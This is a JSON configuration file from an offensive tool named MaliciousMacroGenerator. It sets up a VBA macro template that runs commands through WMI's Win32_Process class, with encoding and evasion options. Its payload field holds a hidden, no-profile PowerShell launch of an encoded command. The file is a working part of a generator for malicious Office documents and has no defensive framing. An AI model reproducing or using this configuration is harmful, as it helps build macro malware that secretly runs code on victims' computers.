MaliciousMacroGenerator/configs/wmi-cmd.json

13 lines
361 B
JSON

{
"description": "Command exec payload using WMI Win32_Process class\nEvasion technique set to none",
"template": "templates/payloads/wmi-template.vba",
"varcount": 150,
"encodingoffset": 3,
"chunksize": 200,
"encodedvars": {},
"vars": [],
"evasion": ["encoder"],
"payload": "cmd.exe /c powershell.exe -nop -w hidden -encodedcommand"
}